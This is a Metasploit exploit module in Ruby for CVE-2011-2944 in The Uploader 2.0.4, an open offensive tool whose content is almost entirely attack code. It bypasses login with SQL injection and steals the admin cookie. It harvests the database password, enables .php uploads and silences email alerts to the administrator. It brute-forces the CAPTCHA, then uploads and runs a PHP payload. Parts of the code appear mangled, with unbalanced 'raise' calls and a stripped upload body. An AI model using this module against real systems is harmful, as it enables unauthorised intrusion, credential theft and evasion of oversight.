require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'The Uploader 2.0.4 (Eng/Ita) Remote File Upload', 'Description'=> %q{ This module exploits various flaws in The Uploader to upload a PHP payload to target system. When run with defaults it will search possible URIs for the application and exploit it automatically. Works against both English and Italian language versions. Notably it disables pre-emptive email warnings before uploading the payload, though it leaves log cleanup as a post-exploitation task. }, 'Author' => [ 'Danny Moules' ], 'References' => [ [ 'URL', '' ], [ 'CVE', '2011-2944' ], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Keys' => ['php'], }, 'License' => MSF_LICENSE, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 23 2012', )) register_options([ Opt::RHOST, Opt::RPORT(80), 'URI', [ true, 'Path of application root (default will try common targets)', '/' ] ), 'CRACKATTEMPTS', [ true, 'Brute force attempts, if required, to crack CAPTCHA', 200 ] ), 'VERBOSE', [ true, 'Verbose output', true ] ), ], self.class) end def get_strings(lang) if lang == "Eng" strings = { "sqlisuccess" => /Log-In has been done successfully/, "whitelistsuccess" => /The extension has been added successfully/, "disablemailsuccess" => /Notification Mail section has been saved successfully/, "changedirsuccess" => /Edit Upload Folder section has been saved successfully/, "captcharequired" => /No result entered/, "uploadsuccess" => /Download Link/, "disablecaptchasuccess" => /Upload Permissions section has been saved successfully/, } elsif lang == "Ita" strings = { "sqlisuccess" => /stato effettuato con successo/, "whitelistsuccess" => /L'estensione è stata consentita con successo/, "disablemailsuccess" => /Mail di Notifica è stata salvata con successo/, "changedirsuccess" => /Modifica Cartella Upload è stata salvata con successo/, "captcharequired" => /Non à stato inserito nessun risultato/, "uploadsuccess" => /Link al download/, "disablecaptchasuccess" => /Permessi Upload è stata salvata con successo/, } end return strings end def exploit #Analyse target analysis = analyse(datastore['URI']) print_status(analysis['status']) strings = get_strings(analysis['lang']) unless analysis['uri'].nil? datastore['URI'] = analysis['uri'] end #Attempt SQLi - Gets the 'first' valid admin account data = "username=' OR activated=1-- a" data << "&password=a" data << "&login=Log-IN" res = send_and_verify( datastore['URI'] + "login.php", "POST", "application/x-www-form-urlencoded", "", data, "SQL injection", strings['sqlisuccess'] ) #Get cookies unless res.headers.include?('Set-Cookie') raise"Nobody gave us a cookie =( SQLi failed") end choc_chip = res.headers['Set-Cookie'] if datastore["VERBOSE"] print_good("I stole the cookie from the cookie jar: #{choc_chip}") end #Optionally, analyse configuration if datastore["VERBOSE"] begin config = analyse_config(strings, choc_chip) print_status("INFO: Database host is #{config['db_host']}") print_status("INFO: Database username is #{config['db_user']}") print_status("INFO: Database password is #{config['db_pass']}") print_status("INFO: Database name is #{config['db_name']}") print_status("INFO: Admin log is #{config['admin_log']}") rescue ::Exception => e err = "Non-fatal error. Failed to analyse configuration: " err << "#{e.class.to_s} #{e.to_s}" print_error(err) end end #Whitelist .php extensions for upload res = send_and_verify( datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=extensionadd", "POST", "application/x-www-form-urlencoded", choc_chip, "allowed_ext=php", "Whitelisting .php extensions", strings['whitelistsuccess'] ) # Disable email reporting res = send_and_verify( datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=mail", "POST", "application/x-www-form-urlencoded", choc_chip, "upload_email=0", "Disabling email reporting", strings['disablemailsuccess'] ) # Change upload location to suit us data = "upload_directory=" data << "&upload_full=" data << datastore['RHOST'] data << datastore['URI'] res = send_and_verify( datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=uploaddir", "POST", "application/x-www-form-urlencoded", choc_chip, data, "Changing upload directory to application root", strings['changedirsuccess'] ) #Disable CAPTCHA on upload (non-fatal) begin res = send_and_verify( datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=captcha", "POST", "application/x-www-form-urlencoded", choc_chip, "captcha_upload=0", "Disabling CAPTCHA on upload", strings['disablecaptchasuccess'] ) rescue ::Exception print_error("Disabling CAPTCHA on upload failed. Will use cracker if necessary.") end #Upload PHP payload upload_uri = "ajax/upload.php" filename = "#{rand_text_alphanumeric(8)}.php" boundary = rand_text_alphanumeric(8) data = %Q{ --#{boundary} Content-Disposition: form-data; name="upfile_1"; filename="#{filename}" Content-Type: text/plain --#{boundary} } res = send_request_raw({ 'uri' => datastore['URI'] + upload_uri, 'method' => 'POST', 'data' => data + '--', 'headers' => { 'Cookie' => choc_chip, 'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Content-Length' => data.length + 2, }, }, 20) #Verify response if res.code != 200 raise"Uploading payload failed (HTTP code #{res.code.to_s})") end # If failure due to CAPTCHA, crack that... if res.body =~ strings['captcharequired'] crack_captcha(data, choc_chip, boundary, upload_uri, strings) else if res.body =~ strings['uploadsuccess'] if datastore["VERBOSE"] print_good("Uploading payload succeeded, triggering...") end else err = "Response doesn't look right." err << " Uploading payload probably failed (will continue anyway)" print_error(err) end end #Attempt to trigger payload res = send_request_cgi({ 'uri' => datastore['URI'] + filename, 'method' => 'GET', 'headers' => { 'Cookie' => choc_chip, }, }, 5) #Verify response if res and res.code != 200 err = "Triggering payload (/#{filename}) failed " err << "(HTTP code #{res.code.to_s})" raise else print_good("Triggering payload (/#{filename}) successful") end end def crack_captcha(data, choc_chip, boundary, upload_uri, strings) captcha_failed = true print_status("CAPTCHA is enabled. Transforming into brute-force CAPTCHA cracker *ping*") crack_data = %Q{ #{data} Content-Disposition: form-data; name="result" 0 --#{boundary} } patience = datastore['CRACKATTEMPTS'] for i in (1..patience) #First visit index page to trigger CAPTCHA reset res = send_request_cgi({ 'uri' => datastore['URI'] + "index.php", 'method' => 'GET', 'headers' => { 'Cookie' => choc_chip }, }, 20) #Now try CAPTCHA with result 0. It'll happen eventually (1/30ish chance). #Maths-based CAPTCHAs are educational kids! res = send_request_raw({ 'uri' => datastore['URI'] + upload_uri, 'method' => 'POST', 'data' => crack_data + '--', 'headers' => { 'Cookie' => choc_chip, 'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Content-Length' => crack_data.length + 2, }, }, 20) if res.body =~ strings['uploadsuccess'] captcha_failed = false break end end if captcha_failed err = "Could not break CAPTCHA in #{patience.to_s} iterations." err << " You might have luck retrying." raise else print_good("CAPTCHA broken. Transforming back into a mild-mannered exploit *ping*") end end def send_and_verify(uri, method, ctype, cookie, data, intent, check) res = send_request_raw({ 'uri' => uri, 'method' => method, 'data' => data, 'headers' => { 'Cookie' => cookie, 'Content-Type' => ctype, 'Content-Length' => data.length, }, }, 20) #Verify response if res.code != 200 raise"#{intent} failed (HTTP code #{res.code.to_s})") end unless res.body =~ check raise"Response doesn't look right. #{intent} probably failed") end if datastore["VERBOSE"] print_good("#{intent} succeeded") end return res end def analyse(uri_set) code = nil found_uri = nil status = "Unknown state" lang = "Eng" unless uri_set =~ /\/$/ then uri_set = "#{uri_set}/" print_status("URI automatically changed to #{uri_set}") end unless uri_set =~ /^\// then uri_set = "/#{uri_set}" print_status("URI automatically changed to #{uri_set}") end if uri_set == "/" then uris = [ "/", "/upload/", "/uploader/", "/theuploader/", "/the_uploader/", "/The%20Uploader/", "/The%20Uploader%202.0.4%20-%20Eng/", "/The%20Uploader%202.0.4%20-%20Ita/" ] else uris = [ uri_set ] end uris.each do |uri| res = send_request_cgi({ 'uri' => uri + "index.php", 'method' => 'GET', }, 20) if res and res.code == 200 if res.body =~ /The Uploader 2\.0/ status = "2.0.* version found at #{uri}" code = Exploit::CheckCode::Vulnerable found_uri = uri elsif res.body =~ /The Uploader/ status = "Detected unknown version at #{uri}" code = Exploit::CheckCode::Detected found_uri = uri end unless found_uri.nil? #Set appropriate language if res.body =~ /Sezione Upload/ lang = "Ita" end http_fingerprint({ :response => res }) break end end end if found_uri.nil? if uri_set == "/" status = "Could not find the web site automatically. Enter URI manually?" else status = "Could not find the web site." status << " Use the default URI to search for the web site automatically" end code = Exploit::CheckCode::Safe end return { "code" => code, "uri" => found_uri, "lang" => lang, "status" => status } end def analyse_config(strings, cookie) #Acquire the database details res = send_request_cgi({ 'uri' => datastore['URI'] + "admin.php?section=upload&category=server", 'method' => 'GET', 'headers' => { 'Cookie' => cookie }, }, 20) unless res and res.code == 200 raise"Acquiring database details failed") end r = /]*name="host"[^>]*value="([^"]*)".*\/>/ db_host = r.match(res.body)[1] r = /]*name="user"[^>]*value="([^"]*)".*\/>/ db_user = r.match(res.body)[1] r = /]*name="pass"[^>]*value="([^"]*)".*\/>/ db_pass = r.match(res.body)[1] r = /]*name="dbnm"[^>]*value="([^"]*)".*\/>/ db_name = r.match(res.body)[1] #Acquire the admin log details res = send_request_cgi({ 'uri' => datastore['URI'] + "admin.php?section=admin&category=admin_log", 'method' => 'GET', 'headers' => { 'Cookie' => cookie }, }, 20) unless res and res.code == 200 raise"Acquiring admin log details failed") end r = /]*name="admin_log"[^>]*checked.*\/>/ if r.match(res.body) admin_log = "active" else admin_log = "inactive" end return { "db_host" => db_host, "db_user" => db_user, "db_pass" => db_pass, "db_name" => db_name, "admin_log" => admin_log, } end def check analysis = analyse("/") print_status(analysis['status']) return analysis['code'] end end